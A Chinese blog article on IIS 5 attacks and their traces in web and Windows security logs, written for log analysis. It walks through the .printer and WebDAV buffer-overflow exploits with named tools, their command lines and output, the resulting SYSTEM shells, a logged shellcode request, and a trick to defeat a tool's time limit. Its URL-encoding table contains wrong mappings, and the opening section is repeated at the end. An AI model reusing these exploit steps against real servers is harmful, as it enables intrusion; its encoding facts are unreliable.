IIS攻击与日志
2008-11-26 21:05
120 查看
IIS
攻击与日志
不管在操作系统上进行了多么精心的配置,不管网络的安全根基打的多么的好,运行其
上的脆弱的应用程序总是能轻松的将它们化为乌有。
INTERNET
信息服务(IIS
)是
WINDOWS 2000
服务器
上应用最广泛的服务,作为微软的主
流
WEB
服务器
,IIS
遍布全球的
服务器
上,因此,几乎所有
的IIS
漏洞都可能成为一次全球性蠕虫袭击的源头,漏洞发现----
蠕虫来袭,几乎成了
WINDOWS 2000
服务器
大灾难的一般规律,尽管发现的漏洞
都已经一一提供了补丁,但是还是让很多网管和媒体手忙脚乱一阵,而我们要做好
IIS
的安全防范,日志是很重要的安全检查手段之一,下面,
我们有必要首先了解一些IIS
攻击的基本知识。
知识点之一:HTTP
请求过程简介
浏览器一般是图形界面的,因此我们图形界面后面所发生的详细细节。
实际上,它的请求过程是这样的:首先,你看到的网址通过DNS
来转换成的IP
地址,你
的计算机会同这个IP
地址建立TCP
连接,连接建立后,就
开始HTTP
请求过程了,
以下是一个完整的HTTP
请求过程,首先我们点击 http://www.chinaload.com/download/
Tue Aug 12 11:47:28 2003
正在连接
www.chinaload.com:80
Tue Aug 12 11:47:28 2003
正在连接
www.chinaload.com [IP=66.111.34.91:80]
Tue Aug 12 11:47:29 2003
已连接
.
Tue Aug 12 11:47:29 2003 GET /download/ HTTP/1.1
Tue Aug 12 11:47:29 2003 Host: www.chinaload.com
Tue Aug 12 11:47:29 2003 Accept: */*
Tue Aug 12 11:47:29 2003 Referer: http://www.chinaload.com/download/
Tue Aug 12 11:47:29 2003 User-Agent: Mozilla/4.0 (compatible; MSIE 5.00;
Windows 98)
Tue Aug 12 11:47:30 2003 HTTP/1.1 200 OK
Tue Aug 12 11:47:30 2003 Date: Tue, 12 Aug 2003 04:46:42 GMT
Tue Aug 12 11:47:30 2003 Server: Apache
Tue Aug 12 11:47:30 2003 Last-Modified: Mon, 09 Jun 2003 02:47:17 GMT
Tue Aug 12 11:47:30 2003 Content-Type: text/plain
由于HTTP
是基于文本,所以它非常容易看懂,在浏览器里我们输入的请求是这样的:
http://www.chinaload.com/download/
这是在请求打开虚拟目录里的DOWNLOAD
目录,而这个虚拟目录实际上影射的是系统里的
一个实际目录:比如说是
c:/wwwroot/download/
所以在
服务器
看来,这个请求就是这样的:
GET /download/ HTTP/1.1
这里举的例子是请求一个目录,请求一个文件也是一样的,比如说我们请求的是:
http://www.chinaload.com/download/index.html
在服务器看来是:
GET /download/index.html HTTP/1.1
如果这个文件是存在的,而且服务器运行正常,那么服务器就会返回index.html
的数
据,并通过浏览器对数据的解析,呈现出我们平时看到的
页面,在成功的获取了文件的数据的情况下,服务器会产生HTTP 200 OK
的应答记
录。如果这个文件不存在就会产生404 notfound
,如果权限
不够就会产生
403
access
denied,
其他的HTTP
常见应答代码还包括:
202 Accepted
已经接受请求,但处理尚未完成;
301 Moved Permanently
客户请求的文档在其他地方,新的URL
在Location
头中给出,
浏览器应该自动地访问新的URL
;
401 Unauthorized
客户试图未经授权访问受密码保护的页面。应答中会包含一个
WWW-Authenticate
头,浏览器据此显示用户名字/
密码对话框
,然后在填写合适的Authorization
头后再次发出请求;
414 Request URI Too Long URI
太长;
500 Internal Server Error
服务器遇到了意料不到的情况,不能完成客户的请求。
如果想得到一份完整的HTTP
应答代码列表,可以在GOOGLE
里搜索,网络上很多地方可以
提供该列表。
知识点之二:URL
的十六进制编码
HTTP
在URL
的请求中允许使用十六进制编码来代替输入的ASCII
字符。
常用的ASCII
字符和十六进制编码的对应表:
ASCII
十六进制编码
/
正斜线
%2F
/
反斜线
%5C
空格
%20
+
加号
%2B
.
句点
%2E
?
问号
%3C
:
冒号
%3A
例如:对于www.bbs.com/data
下的“BAK DATA FILE.DBA
”的十六进制表达方式就是:
http://www.bbs.com/data/bak%20data%20file.dba
知识点之三:netcat
的使用
netcat
有”网络瑞士军刀“之称,我们在这里主要介绍一下它在WEB
攻击中的应用。
首先,netcat
允许原始的HTTP
输入,这与IE
等浏览器不同,IE
浏览器会删除额外的输
入,例如“../../
”,这会禁止部分遍历攻击。
其次,netcat
也允许原始的HTTP
输出,这样得到的服务器应答将会更全面、更细致,而
浏览器则只会显示HTML
那些在源码里注释过的内容,忽
略了更重要的信息。
下面我们来看一个例子:
Microsoft Windows [
版本
5.2.3790]
(C)
版权所有
1985-2003 Microsoft Corp.
C:/Documents and Settings/Administrator>e:
E:/>
E:/>nc -vv 192.168.0.100 80
192.168.0.100: inverse host lookup failed: h_errno 11004: NO_DATA
(UNKNOWN) [192.168.0.100] 80 (http) open
get / http/1.1
HTTP/1.1 400 Bad Request
Server: Microsoft-IIS/5.0
Date: Mon, 15 Dec 2003 03:51:30 GMT
Content-Type: text/html
Content-Length: 87
<html><head><title>Error</title></head><body>The parameter is incorrect.
</body>
</html>sent 16, rcvd 224: NOTSOCK
E:/>
我们可以看到建立了连接以后,目标会告诉我们80
端口开放,然后我们输入
get /
http/1.1
来请求WWWROOT
里的默认文件,回车。
于是原始的HTTP
应答便完整的显示在了屏幕上,包括IIS
的类型和完整的脚本输出。
如果为了节省时间,提高速度,可以将需要输入的内容事先作成一个TXT
文本,比如说
文件名是1.txt
,然后使用
E:/>nc -vv 192.168.0.100 80 < 1.txt
可以得到相同的返回内容。
更多的有趣内容可以通过nc -h
命令了解到,需要注意的一点是:netcat
不能连接到被
SSL
保护的WEB
服务器。
目前最有威胁的IIS5
攻击有两种,一种是IIS5
缓冲区溢出,另外的一种是IIS
拒绝服
务。
IIS5
缓冲区溢出
我曾经粗略做了一个统计,WINDOWS
涉及到溢出的漏洞稍微多于LINUX
,而WINDOWS
的大
量的溢出漏洞与IIS
有关,所以没有IIS
的WINDOWS
的整体
安全性绝对要高于LINUX
,这几句话涉及到了WINDOWS
与LINUX
之争,所以就不再多说
了,免得又引起无谓的“口水战”。
熟悉缓冲区溢出攻击必须对溢出的工作方式有所了解,由于本身溢出就是一个很大的课
题,所以我们只简单的介绍一下:如果一个程序没有限
制输入的字符长度或者检查输入长度是否正确,就会发生溢出。一个没有进行限制的输
入就有可能因为输入长度的问题“溢出”到CPU
运行栈的
另一部分去,如果这个输入被精心的设计过,那么它可以被用来运行指定的代码。而
IIS
运行的帐户环境是SYSTEM
,所以通过溢出得到的是
SYSTEM
权限,而SYSTEM
权限是系统内的最高技术权限,因此IIS
缓冲区溢出造成的灾难
往往是致命的。
IPP
缓冲区溢出
这个漏洞比较早了,但是一直私下里认为这是一个很典型的IIS
溢出漏洞攻击,所以又
翻了出来,这个漏洞存在于处理.printer
文件的ISAPI
过
滤器(c:/winnt/system32/msw3prt.dll
),
它为WIN2000
提供INTERNET
打印协议,即
IPP
的支持,可实现对网络打印机的基于WEB
的控制,
在.printer ISAPI
请求中,在HTTP HOST
:头中发送420
字节的缓冲区,就会发生溢出,
如下:
GET /NULL.PRINTER HTTP/1.0
HOST
: [BUFFER
为420
个字符
]
发生溢出后IIS
异常终止,但是为了2000
为了保障WEB
的弹性运行,这时会自动重新运行
IIS
(inetinfo.exe
),
在后面提供的日志里你可以充分
的注意到这一点。
互联网上流行的最成功的一个IPP
漏洞利用工具是IIS5HACK
,不过最近的这个工具的版
本好象都被加了木马。
操作如下:
E:/>iis5hack 192.168.0.87 80 0 1256
iis5 remote .printer overflow. writen by sunx
http://www.sunx.org
for test only, dont used to hack, :p
connecting...
sending...
checking...
Now you can telnet to 1256 port
good luck :)
E:/>
这时使用“telnet 192.168.0.87 1256
”就可以连接到目标
服务器
上,我们可以看到目
标
服务器
系统装在H
盘上。
http://www.sunx.org
Microsoft Windows 2000 [Version 5.00.2195]
(C)
版权所有
1985-1998 Microsoft Corp.
H:/WINNT/system32>
在这个过程里,IIS
日志里一般不会出现记录,但是在事件查看器里的系统日志项目里
将会出现IIS
各个组建停止的信息,安全项目里也将出现
以下的日志:
事件类型:
成功审核
事件来源
: Security
事件种类:
系统事件
事件
ID: 515
日期
: 2003-12-16
事件
: 15:34:13
用户
: NT AUTHORITY/SYSTEM
计算机
: 123-DK8KIFN4NZR
描述
:
受信任的登录过程已经在本地安全机制机构注册。 将信任这个登录过程来提交登录申
请。
登录过程名
: /inetinfo.exe
事件类型:
成功审核
事件来源
: Security
事件种类:
特权使用
事件
ID: 577
日期
: 2003-12-16
事件
: 15:34:13
用户
: NT AUTHORITY/SYSTEM
计算机
: 123-DK8KIFN4NZR
描述
:
调用的特许服务
:
服务器
: NT Local Security Authority / Authentication Service
服务
: LsaRegisterLogonProcess()
主要用户名
: 123-DK8KIFN4NZR$
主要域
: SERVER
主要登录
ID: (0x0,0x3E7)
客户端用户名
: 123-DK8KIFN4NZR$
客户端域
: SERVER
客户端登录
ID: (0x0,0x3E7)
特权
: SeTcbPrivilege
事件类型:
成功审核
事件来源
: Security
事件种类:
帐户登录
事件
ID: 680
日期
: 2003-12-16
事件
: 15:34:13
用户
: NT AUTHORITY/SYSTEM
计算机
: 123-DK8KIFN4NZR
描述
:
为登录所用的帐户
: MICROSOFT_AUTHENTICATION_PACKAGE_V1_0
帐户名
:
IUSR_123-DK8KIFN4NZR
工作站
:
123-DK8KIFN4NZR
事件类型:
成功审核
事件来源
: Security
事件种类:
登录/
注销
事件
ID: 540
日期
: 2003-12-16
事件
: 15:34:13
用户
: 123-DK8KIFN4NZR/IUSR_123-DK8KIFN4NZR
计算机
: 123-DK8KIFN4NZR
描述
:
成功的网络登录
:
用户名
: IUSR_123-DK8KIFN4NZR
域
: 123-DK8KIFN4NZR
登录
ID: (0x0,0x17FBA)
登录类型
: 3
登录过程
: IIS
身份验证程序包
: MICROSOFT_AUTHENTICATION_PACKAGE_V1_0
工作站名
: 123-DK8KIFN4NZR
事件类型:
成功审核
事件来源
: Security
事件种类:
特权使用
事件
ID: 576
日期
: 2003-12-16
事件
: 15:34:13
用户
: 123-DK8KIFN4NZR/IUSR_123-DK8KIFN4NZR
计算机
: 123-DK8KIFN4NZR
描述
:
指派给新登录的特殊权限
:
用户名
: IUSR_123-DK8KIFN4NZR
域
: 123-DK8KIFN4NZR
登录
ID: (0x0,0x17FBA)
已指派
: SeChangeNotifyPrivilege
事件类型:
成功审核
事件来源
: Security
事件种类:
详细追踪
事件
ID: 592
日期
: 2003-12-16
事件
: 15:34:57
用户
: NT AUTHORITY/SYSTEM
计算机
: 123-DK8KIFN4NZR
描述
:
已经创建新的过程
:
新的过程
ID: 4282631840
映象文件名
: /WINNT/system32/dllhost.exe
创建者过程
ID: 2258146112
用户名
: 123-DK8KIFN4NZR$
域
: SERVER
登录
ID: (0x0,0x3E7)
事件类型:
成功审核
事件来源
: Security
事件种类:
详细追踪
事件
ID: 592
日期
: 2003-12-16
事件
: 15:34:58
用户
: NT AUTHORITY/SYSTEM
计算机
: 123-DK8KIFN4NZR
描述
:
已经创建新的过程
:
新的过程
ID: 4280877088
映象文件名
: /WINNT/system32/cmd.exe
创建者过程
ID: 4285625728
用户名
: 123-DK8KIFN4NZR$
域
: SERVER
登录
ID: (0x0,0x3E7)
从上面我们可以看出,在判断溢出攻击的时候,仅仅靠WEB
日志还是不够的,因为在发
生溢出的时候,IIS
多半已经被停止了,无法提供给我们
更多的线索,需要更好的对攻击进行分析的话,需要我们多方位的入手。
WebDAV
远程缓冲区溢出漏洞
WebDAV
是 HTTP
规范的行业标准扩展。“WebDAV
”中的“DAV
”代表“分布式创作和版
本控制”。WebDAV
为授权用户提供了在
Web
服务器
上
远程添加和管理内容的能力。IIS5
默认提供了对WebDAV
的支持,通过WebDAV
可以通过
HTTP
向用户提供远程文件存储的服务。但是作为普通的
HTTP
服务器
,这个功能没有必要。
IIS5
包含的WebDAV
组件不充分检查传递给部分系统组件的数据,远程攻击者利用这个漏
洞对WebDAV
进行缓冲区溢出攻击,可能以WEB
进程权限在
系统上执行任意指令。IIS 5.0
的WebDAV
使用了ntdll.dll
中的一些函数,而这些函数存
在一个缓冲区溢出漏洞。通过对WebDAV
的畸形请求可以
触发这个溢出。成功利用这个漏洞可以获得LocalSystem
权限。这意味着,入侵者可以
获得主机的完全控制能力。任何能够将 WebDAV
请求传输
到受影响的 Web
服务器的用户都可以尝试利用此弱点。由于 WebDAV
请求是在
HTTP
所在的同一端口(通常是端口 80
)上传输,这实质上意
味着任何能够与受影响的服务器建立连接的用户都可以尝试利用此弱点。
网络上WebDAV
攻击工具非常的多,使用也很简单,所以造成了前一段时间WEBDAV
攻击泛
滥,
其中最著名的是WEBDAVX3
,需要注意的是这个程序是有时间期限的,但是可以通过调整
系统时间的方法解决,比如说将时间调回2002
年,这并不会影响这个程序的使用。
C:/>webdavx3 192.168.0.1
IIS WebDAV overflow remote exploit by isno@xfocus.org
start to try offset,
if STOP a long time, you can press ^C and telnet 192.168.0.1 7788
try offset: 0
try offset: 1
try offset: 2
try offset: 3
try offset: 4
try offset: 5
try offset: 6
try offset: 7
try offset: 8
try offset: 9
try offset: 10
try offset: 11
try offset: 12
try offset: 13
try offset: 14
try offset: 15
try offset: 16
try offset: 17
try offset: 18
try offset: 19
try offset: -1
try offset: -2
try offset: -3
waiting for iis restart.......................
(IIS
正在重起)
try offset: -4
在这一时候计算机会有一段长时间停止,只需要使用^C
短开,就可以使用NC
或者
TELNET
连上去了。
C:/>nc -vv 192.168.0.1 7788
192.168.0.1: inverse host lookup failed: h_errno 11004: NO_DATA
(UNKNOWN) [192.168.0.1] 7788 (?) open
Microsoft Windows 2000 [Version 5.00.2195]
(C)
版权所有
1985-2000 Microsoft Corp.
C:/WINNT/system32>
以下是遭到WEBDAV
溢出攻击后的WEB
日志主要特征:
2003-12-16 05:51:38 192.168.0.235 - 192.168.0.87 80 LOCK
/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAA
契桘杲楜契桘杲楜契桘杲楜契桘杲楜契桘杲楜契桘杲楜契桘杲楜契
桘杲楜厐晞暭餽畠囸噖晟暭丽琀連愬傐晙邭愬咍炈咍邊咍
炊咍邊塒璪痘郖偘偐郃悙
ffilomidomfafdfgfhinhnlaljbeaaaaaalimmmmmmmmpdklojieaaaaaaipefpainlnpepppppp
gekbaaaaaaaaijehaigeijdnaaaaaaaamhefpeppppppppile
fpaidoiahijefpiloaaaabaaaoideaaaaaaibmgaabaaaaaolagibmgaaeaaaaailagdneoeoeoe
ohfpbidmgaeikagegdmfjhfpjikagegdmfihfpcggknggdnfj
fihfokppogolpofifailhnpaijehpcmdileeceamafliaaaaaamhaaeeddccbbddmamdolomoihh
ppppppcecececeNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN -
400 -
在事件查看器里的系统日志项目里将会出现IIS
各个组件停止的信息,安全项目里也将
出现
以下的日志:
事件类型:
成功审核
事件来源
: Security
事件种类:
详细追踪
事件
ID: 592
日期
: 2003-12-16
事件
: 13:52:02
用户
: NT AUTHORITY/SYSTEM
计算机
: 123-DK8KIFN4NZR
描述
:
已经创建新的过程
:
新的过程
ID: 4281625184
映象文件名
: /WINNT/system32/iisreset.exe
创建者过程
ID: 2171497184
用户名
: 123-DK8KIFN4NZR$
域
: SERVER
登录
ID: (0x0,0x3E7)
事件类型:
成功审核
事件来源
: Security
事件种类:
详细追踪
事件
ID: 592
日期
: 2003-12-16
事件
: 13:52:03
用户
: NT AUTHORITY/SYSTEM
计算机
: 123-DK8KIFN4NZR
描述
:
已经创建新的过程
:
新的过程
ID: 2276659232
映象文件名
: /WINNT/system32/inetsrv/iisrstas.exe
创建者过程
ID: 2244638496
用户名
: 123-DK8KIFN4NZR$
域
: SERVER
登录
ID: (0x0,0x3E7)
事件类型:
成功审核
事件来源
: Security
事件种类:
详细追踪
事件
ID: 592
日期
: 2003-12-16
事件
: 13:52:03
用户
: NT AUTHORITY/SYSTEM
计算机
: 123-DK8KIFN4NZR
描述
:
已经创建新的过程
:
新的过程
ID: 4274700320
映象文件名
: /WINNT/system32/inetsrv/inetinfo.exe
创建者过程
ID: 2171497184
用户名
: 123-DK8KIFN4NZR$
域
: SERVER
登录
ID: (0x0,0x3E7)
事件类型:
成功审核
事件来源
: Security
事件种类:
特权使用
事件
ID: 577
日期
: 2003-12-16
事件
: 13:52:03
用户
: NT AUTHORITY/SYSTEM
计算机
: 123-DK8KIFN4NZR
描述
:
调用的特许服务
:
服务器
: NT Local Security Authority / Authentication Service
服务
: LsaRegisterLogonProcess()
主要用户名
: 123-DK8KIFN4NZR$
主要域
: SERVER
主要登录
ID: (0x0,0x3E7)
客户端用户名
: 123-DK8KIFN4NZR$
客户端域
: SERVER
客户端登录
ID: (0x0,0x3E7)
特权
: SeTcbPrivilege
事件类型:
成功审核
事件来源
: Security
事件种类:
详细追踪
事件
ID: 593
日期
: 2003-12-16
事件
: 13:52:10
用户
: NT AUTHORITY/SYSTEM
计算机
: 123-DK8KIFN4NZR
描述
:
已经退出某过程
:
过程
ID: 832
用户名
: 123-DK8KIFN4NZR$
域
: SERVER
登录
ID: (0x0,0x3E7)
事件类型:
成功审核
事件来源
: Security
事件种类:
详细追踪
事件
ID: 593
日期
: 2003-12-16
事件
: 13:52:16
用户
: NT AUTHORITY/SYSTEM
计算机
: 123-DK8KIFN4NZR
描述
:
已经退出某过程
:
过程
ID: 980
用户名
: 123-DK8KIFN4NZR$
域
: SERVER
登录
ID: (0x0,0x3E7)
事件类型:
成功审核
事件来源
: Security
事件种类:
系统事件
事件
ID: 515
日期
: 2003-12-16
事件
: 13:52:25
用户
: NT AUTHORITY/SYSTEM
计算机
: 123-DK8KIFN4NZR
描述
:
受信任的登录过程已经在本地安全机制机构注册。 将信任这个登录过程来提交登录申
请。
登录过程名
: /inetinfo.exe
事件类型:
成功审核
事件来源
: Security
事件种类:
特权使用
事件
ID: 577
日期
: 2003-12-16
事件
: 13:52:25
用户
: NT AUTHORITY/SYSTEM
计算机
: 123-DK8KIFN4NZR
描述
:
调用的特许服务
:
服务器
: NT Local Security Authority / Authentication Service
服务
: LsaRegisterLogonProcess()
主要用户名
: 123-DK8KIFN4NZR$
主要域
: SERVER
主要登录
ID: (0x0,0x3E7)
客户端用户名
: 123-DK8KIFN4NZR$
客户端域
: SERVER
客户端登录
ID: (0x0,0x3E7)
特权
: SeTcbPrivilege
事件类型:
成功审核
事件来源
: Security
事件种类:
帐户登录
事件
ID: 680
日期
: 2003-12-16
事件
: 13:52:25
用户
: NT AUTHORITY/SYSTEM
计算机
: 123-DK8KIFN4NZR
描述
:
为登录所用的帐户
: MICROSOFT_AUTHENTICATION_PACKAGE_V1_0
帐户名
:
IUSR_123-DK8KIFN4NZR
工作站
:
123-DK8KIFN4NZR
事件类型:
成功审核
事件来源
: Security
事件种类:
登录/
注销
事件
ID: 540
日期
: 2003-12-16
事件
: 13:52:25
用户
: 123-DK8KIFN4NZR/IUSR_123-DK8KIFN4NZR
计算机
: 123-DK8KIFN4NZR
描述
:
成功的网络登录
:
用户名
: IUSR_123-DK8KIFN4NZR
域
: 123-DK8KIFN4NZR
登录
ID: (0x0,0x1D0EFE)
登录类型
: 3
登录过程
: IIS
身份验证程序包
: MICROSOFT_AUTHENTICATION_PACKAGE_V1_0
工作站名
: 123-DK8KIFN4NZR
事件类型:
成功审核
事件来源
: Security
事件种类:
特权使用
事件
ID: 576
日期
: 2003-12-16
事件
: 13:52:25
用户
: 123-DK8KIFN4NZR/IUSR_123-DK8KIFN4NZR
计算机
: 123-DK8KIFN4NZR
描述
:
指派给新登录的特殊权限
:
用户名
: IUSR_123-DK8KIFN4NZR
域
: 123-DK8KIFN4NZR
登录
ID: (0x0,0x1D0EFE)
已指派
: SeChangeNotifyPrivilege
事件类型:
成功审核
事件来源
: Security
事件种类:
详细追踪
事件
ID: 592
日期
: 2003-12-16
事件
: 13:52:25
用户
: NT AUTHORITY/SYSTEM
计算机
: 123-DK8KIFN4NZR
描述
:
已经创建新的过程
:
新的过程
ID: 4276928544
映象文件名
: /WINNT/system32/cmd.exe
创建者过程
ID: 4274700320
用户名
: 123-DK8KIFN4NZR$
域
: SERVER
登录
ID: (0x0,0x3E7)
需要注意的是,在WEBDAV
溢出的过程中IIS
会产生多次重复启动,而在WEB
的日志里并不
能看出这一点,而这一点在事件查看器里的系统日志里和安全日志里都可以清楚的看
到。
关于WEBDAV
的防范措施与本主题无关,且网络上很多地方提供了,就不赘述了。
攻击与日志
不管在操作系统上进行了多么精心的配置,不管网络的安全根基打的多么的好,运行其
上的脆弱的应用程序总是能轻松的将它们化为乌有。
INTERNET
信息服务(IIS
)是
WINDOWS 2000
服务器
上应用最广泛的服务,作为微软的主
流
WEB
服务器
,IIS
遍布全球的
服务器
上,因此,几乎所有
的IIS
漏洞都可能成为一次全球性蠕虫袭击的源头,漏洞发现----
蠕虫来袭,几乎成了
WINDOWS 2000
服务器
大灾难的一般规律,尽管发现的漏洞
都已经一一提供了补丁,但是还是让很多网管和媒体手忙脚乱一阵,而我们要做好
IIS
的安全防范,日志是很重要的安全检查手段之一,下面,
我们有必要首先了解一些IIS
攻击的基本知识。
知识点之一:HTTP
请求过程简介
浏览器一般是图形界面的,因此我们图形界面后面所发生的详细细节。
实际上,它的请求过程是这样的:首先,你看到的网址通过DNS
来转换成的IP
地址,你
的计算机会同这个IP
地址建立TCP
连接,连接建立后,就
开始HTTP
请求过程了,
以下是一个完整的HTTP
请求过程,首先我们点击 http://www.chinaload.com/download/
Tue Aug 12 11:47:28 2003
正在连接
www.chinaload.com:80
Tue Aug 12 11:47:28 2003
正在连接
www.chinaload.com [IP=66.111.34.91:80]
Tue Aug 12 11:47:29 2003
已连接
.
Tue Aug 12 11:47:29 2003 GET /download/ HTTP/1.1
Tue Aug 12 11:47:29 2003 Host: www.chinaload.com
Tue Aug 12 11:47:29 2003 Accept: */*
Tue Aug 12 11:47:29 2003 Referer: http://www.chinaload.com/download/
Tue Aug 12 11:47:29 2003 User-Agent: Mozilla/4.0 (compatible; MSIE 5.00;
Windows 98)
Tue Aug 12 11:47:30 2003 HTTP/1.1 200 OK
Tue Aug 12 11:47:30 2003 Date: Tue, 12 Aug 2003 04:46:42 GMT
Tue Aug 12 11:47:30 2003 Server: Apache
Tue Aug 12 11:47:30 2003 Last-Modified: Mon, 09 Jun 2003 02:47:17 GMT
Tue Aug 12 11:47:30 2003 Content-Type: text/plain
由于HTTP
是基于文本,所以它非常容易看懂,在浏览器里我们输入的请求是这样的:
http://www.chinaload.com/download/
这是在请求打开虚拟目录里的DOWNLOAD
目录,而这个虚拟目录实际上影射的是系统里的
一个实际目录:比如说是
c:/wwwroot/download/
所以在
服务器
看来,这个请求就是这样的:
GET /download/ HTTP/1.1
